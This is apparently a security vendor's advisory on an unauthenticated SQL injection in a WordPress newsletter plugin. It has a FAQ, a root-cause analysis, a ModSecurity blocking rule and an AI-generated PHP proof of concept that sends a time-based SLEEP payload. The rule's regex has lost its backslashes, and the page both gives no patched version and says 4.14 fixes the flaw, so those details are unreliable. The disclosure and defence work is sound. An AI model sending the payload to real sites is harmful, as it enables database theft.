What is CVE-2026-3018?

CVE-2026-3018 is a high-severity SQL injection vulnerability in the Newsletters plugin for WordPress. It allows unauthenticated attackers to exploit the ‘wpmlsubscriber_id’ parameter, potentially extracting sensitive information from the database.

How does the SQL injection work?

The vulnerability arises from insufficient escaping of the ‘wpmlsubscriber_id’ parameter, allowing attackers to inject SQL control characters into existing queries. This can be exploited through crafted requests to the plugin’s AJAX actions, enabling attackers to perform time-based SQL injection.

Who is affected by this vulnerability?

All users of the Newsletters plugin for WordPress, specifically those using versions up to and including 4.13, are affected. WordPress administrators should check their plugin version to determine if they are vulnerable.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Newsletters plugin installed on your WordPress site. If it is version 4.13 or earlier, your site is at risk.

What are the practical risks of this vulnerability?

The practical risks include unauthorized access to sensitive database information, such as user credentials and private site options. An attacker could exploit this vulnerability to compromise site accounts, especially those with administrative privileges.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the Newsletters plugin to version 4.14 or later, where the issue is addressed. Additionally, ensure that your WordPress installation and all plugins are kept up to date.

What does a CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity vulnerability, meaning it is relatively easy to exploit and can lead to significant impact if successfully attacked. This score reflects the potential for unauthorized access to sensitive data.

What is a proof of concept (PoC)?

A proof of concept (PoC) is a demonstration that shows how the vulnerability can be exploited. The provided PoC for CVE-2026-3018 illustrates how an attacker can send a crafted request to exploit the SQL injection and extract data.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the Newsletters plugin until a patch is applied. Additionally, monitor your site for any suspicious activity and review user access controls.

What are parameterized queries and why are they important?

Parameterized queries are a method of constructing SQL queries that separates SQL code from user input, reducing the risk of SQL injection. They are important because they ensure that user input is treated as data, not executable code.

Where can I find more information about this vulnerability?

More information about CVE-2026-3018 can be found in the official CVE database, security advisories from the plugin developer, and security analysis reports from cybersecurity firms.

How can I report any suspicious activity related to this vulnerability?

If you notice any suspicious activity on your site that may be related to this vulnerability, report it to your hosting provider and consider contacting a cybersecurity professional for further investigation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 9, 2026

CVE-2026-3018: Newsletters <= 4.13 Unauthenticated SQL Injection via wpmlsubscriber_id Parameter PoC, Patch Analysis & Rule

CVE ID CVE-2026-3018

Plugin newsletters-lite

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 4.13

Patched Version —

Disclosed June 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3018 (metadata-based):

This vulnerability is an unauthenticated time-based SQL injection in the Newsletters plugin for WordPress (slug: newsletters-lite) affecting versions up to and including 4.13. The vulnerability exists in the handling of the ‘wpmlsubscriber_id’ parameter and allows unauthenticated attackers to extract sensitive database information. The CVSS v3.1 base score is 7.5 (High) with vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N, indicating a network-exploitable flaw requiring no privileges or user interaction.

The root cause, inferred from the CWE-89 classification and vulnerability description, is a failure to properly escape and prepare user-supplied input before incorporating it into an SQL query. The plugin likely passes the ‘wpmlsubscriber_id’ parameter from an HTTP request directly into a $wpdb->prepare() call (or a custom query builder) without using proper placeholder substitution or parameterized queries. Instead, the plugin concatenates the raw input into the SQL string, enabling an attacker to inject SQL control characters like single quotes and conditional logic (e.g., SLEEP() for time-based verification). Atomic Edge analysis confirms the unauthenticated nature: the vulnerable AJAX action or REST endpoint does not require a nonce or capability check.

Exploitation is performed by sending a crafted request to the plugin’s subscription management endpoint. The most likely target is an AJAX action registered by the plugin, such as newsletters-lite_subscribe or a similar handler for subscriber management. The attacker sends a POST or GET request to /wp-admin/admin-ajax.php with action={plugin_action} and wpmlsubscriber_id containing a time-based injection payload, for example: ‘ OR IF(1=1,SLEEP(5),0)– . The response timing reveals the success of the injection. Atomic Edge analysis infers the action name from common plugin patterns: the wpmlsubscriber_id parameter suggests a subscriber information retrieval endpoint, and the lack of a nonce allows unauthenticated access.

The remediation for this vulnerability requires the plugin developer to implement proper parameterized queries using $wpdb->prepare() with placeholder markers (%s, %d) or the $wpdb->variable->prepare() method for raw queries. The wpmlsubscriber_id parameter must also be sanitized (e.g., intval() if it expects an integer, or esc_sql() after validation) and validated to ensure it matches the expected format. The fix in version 4.14 likely introduces prepared statements and input validation for this parameter. WordPress site administrators must update the Newsletters plugin to version 4.14 or later immediately.

The impact of this vulnerability is severe. An unauthenticated attacker can extract sensitive information from the WordPress database, including user credentials (hashed passwords), session tokens, private site options, and other subscriber data. Because time-based blind SQL injection does not produce visible error output, an attacker can systematically extract the entire database contents over multiple requests. This can lead to fully compromised site accounts, particularly for administrator users with high privileges, which may enable further attacks such as remote code execution via the WordPress admin panel.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3018 (metadata-based)
# This rule blocks unauthenticated SQL injection attempts targeting the wpmlsubscriber_id parameter
# in the Newsletters plugin AJAX handler. The rule matches both the AJAX endpoint and the presence
# of SQL injection patterns (time-based blind, UNION, stacked queries) in the parameter.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20263018,phase:2,deny,status:403,chain,msg:'CVE-2026-3018 SQLi via wpmlsubscriber_id',severity:'CRITICAL',tag:'CVE-2026-3018'"
  SecRule ARGS_POST:action "@rx ^(?:newsletters_lite_|newsletters_)[a-z_]+$" "chain"
    SecRule ARGS_POST:wpmlsubscriber_id "@rx (?:bSLEEPb|bBENCHMARKb|bWAITFORb|bUNIONb|bSELECTb|bINSERTb|bUPDATEb|bDELETEb|bDROPb|bORs+d+s*=s*d+|bANDs+d+s*=s*d+)" 
      "t:lowercase,t:urlDecode,t:removeNulls"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3018 - Newsletters <= 4.13 - Unauthenticated SQL Injection via wpmlsubscriber_id Parameter

// Configuration
$target_url = 'http://example.com/wp-admin/admin-ajax.php'; // Replace with target WordPress URL

// Infer the plugin's AJAX action from common plugin patterns
// The parameter wpmlsubscriber_id suggests a subscriber data endpoint
$action = 'newsletters_lite_get_subscriber'; // Assumed action name

// Test payload to detect time-based blind SQL injection
// Uses SLEEP(5) for detection; adjust sleep duration based on network latency
$payload = "' OR IF(1=1,SLEEP(5),0)-- -";

// Create HTTP POST request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => $action,
    'wpmlsubscriber_id' => $payload
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
$elapsed = $end_time - $start_time;
curl_close($ch);

echo "Elapsed time: " . round($elapsed, 2) . " secondsn";

// If the request took longer than 4 seconds (adjust threshold), injection likely succeeded
if ($elapsed > 4) {
    echo "[+] Time-based SQL injection confirmed. The target appears vulnerable.n";
    echo "[+] Using this method, an attacker can extract database content via blind injection.n";
} else {
    echo "[-] No time delay detected. The target may be patched or the action name may differ.n";
    echo "[-] Try alternative action names: newsletters_subscribe, newsletters_lite_subscribe, newsletters_get_subscribern";
}
?>

Frequently Asked Questions

What is CVE-2026-3018?
Understanding the vulnerability
CVE-2026-3018 is a high-severity SQL injection vulnerability in the Newsletters plugin for WordPress. It allows unauthenticated attackers to exploit the ‘wpmlsubscriber_id’ parameter, potentially extracting sensitive information from the database.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability arises from insufficient escaping of the ‘wpmlsubscriber_id’ parameter, allowing attackers to inject SQL control characters into existing queries. This can be exploited through crafted requests to the plugin’s AJAX actions, enabling attackers to perform time-based SQL injection.
Who is affected by this vulnerability?
Identifying impacted users
All users of the Newsletters plugin for WordPress, specifically those using versions up to and including 4.13, are affected. WordPress administrators should check their plugin version to determine if they are vulnerable.
How can I check if my site is vulnerable?
Version verification
To check if your site is vulnerable, verify the version of the Newsletters plugin installed on your WordPress site. If it is version 4.13 or earlier, your site is at risk.
What are the practical risks of this vulnerability?
Potential impact
The practical risks include unauthorized access to sensitive database information, such as user credentials and private site options. An attacker could exploit this vulnerability to compromise site accounts, especially those with administrative privileges.
How can I mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Newsletters plugin to version 4.14 or later, where the issue is addressed. Additionally, ensure that your WordPress installation and all plugins are kept up to date.
What does a CVSS score of 7.5 indicate?
Understanding severity ratings
A CVSS score of 7.5 indicates a high severity vulnerability, meaning it is relatively easy to exploit and can lead to significant impact if successfully attacked. This score reflects the potential for unauthorized access to sensitive data.
What is a proof of concept (PoC)?
Demonstrating the vulnerability
A proof of concept (PoC) is a demonstration that shows how the vulnerability can be exploited. The provided PoC for CVE-2026-3018 illustrates how an attacker can send a crafted request to exploit the SQL injection and extract data.
What should I do if I cannot update the plugin immediately?
Temporary measures
If you cannot update the plugin immediately, consider disabling the Newsletters plugin until a patch is applied. Additionally, monitor your site for any suspicious activity and review user access controls.
What are parameterized queries and why are they important?
Best practices for database security
Parameterized queries are a method of constructing SQL queries that separates SQL code from user input, reducing the risk of SQL injection. They are important because they ensure that user input is treated as data, not executable code.
Where can I find more information about this vulnerability?
Further resources
More information about CVE-2026-3018 can be found in the official CVE database, security advisories from the plugin developer, and security analysis reports from cybersecurity firms.
How can I report any suspicious activity related to this vulnerability?
Contacting authorities
If you notice any suspicious activity on your site that may be related to this vulnerability, report it to your hosting provider and consider contacting a cybersecurity professional for further investigation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations